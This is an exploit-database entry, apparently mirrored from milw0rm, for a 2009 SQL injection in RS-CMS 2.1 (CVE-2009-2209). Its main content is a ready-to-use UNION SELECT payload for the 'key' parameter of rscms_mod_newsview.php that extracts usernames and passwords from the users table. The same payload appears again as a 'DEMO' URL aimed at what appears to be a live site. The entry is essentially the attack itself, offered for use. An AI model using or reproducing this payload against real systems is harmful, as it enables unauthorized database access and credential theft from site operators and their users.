[] NeoSense
E X P L O I T S
title author type platform port cve id

RS-CMS 2.1 - 'key' SQL Injection

Author: Mr.tro0oqy
type: webapps
platform: php
port: 
date_added: 2009-06-21 
date_updated:  
verified: 1 
codes: OSVDB-55325;CVE-2009-2209 
tags: 
aliases:  
screenshot_url:  
application_url: 
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability

[+] Found by : Mr.tro0oqy

[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
BUGS
====

Sql Injections:
rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--

DEMO
====
http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
all my Friends

# milw0rm.com [2009-06-22]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.